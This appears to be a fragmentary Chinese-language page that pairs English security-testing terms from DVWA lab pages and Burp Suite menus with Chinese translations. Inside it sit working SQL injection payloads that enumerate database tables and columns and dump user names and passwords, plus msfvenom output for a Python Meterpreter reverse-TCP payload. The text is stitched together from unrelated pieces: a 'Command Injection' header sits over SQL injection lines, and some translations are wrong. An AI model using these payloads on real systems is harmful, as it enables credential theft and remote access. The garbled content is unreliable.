Vulnerability: Command Injection
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273
1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users
python/meterpreter/reverse_tcp
No platform was selected, choosing Msf::Module::Platform::Python from the payload
No arch selected, selecting arch: python from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 454 bytes
The value specified for payload is not valid.
Repeater | Intruder | Sequencer | Comparer | Extender | Alerts |
---|---|---|---|---|---|
中继器 | 入侵器 | 序列器 | 比较器 | 扩展器 | 警报 |
Intense scan
强劲 扫描
Sanitize
使卫生
strip slashes
移除 斜杠
Vulnerability: Reflected Cross Site Scripting (XSS)
漏洞:反射的跨站点脚本(XSS)
Vulnerability: 易遭攻击 / 易受伤害 / 易遭责难
Reflected: 反射
Cross: 交叉符号/穿过/交叉/跨过
网友评论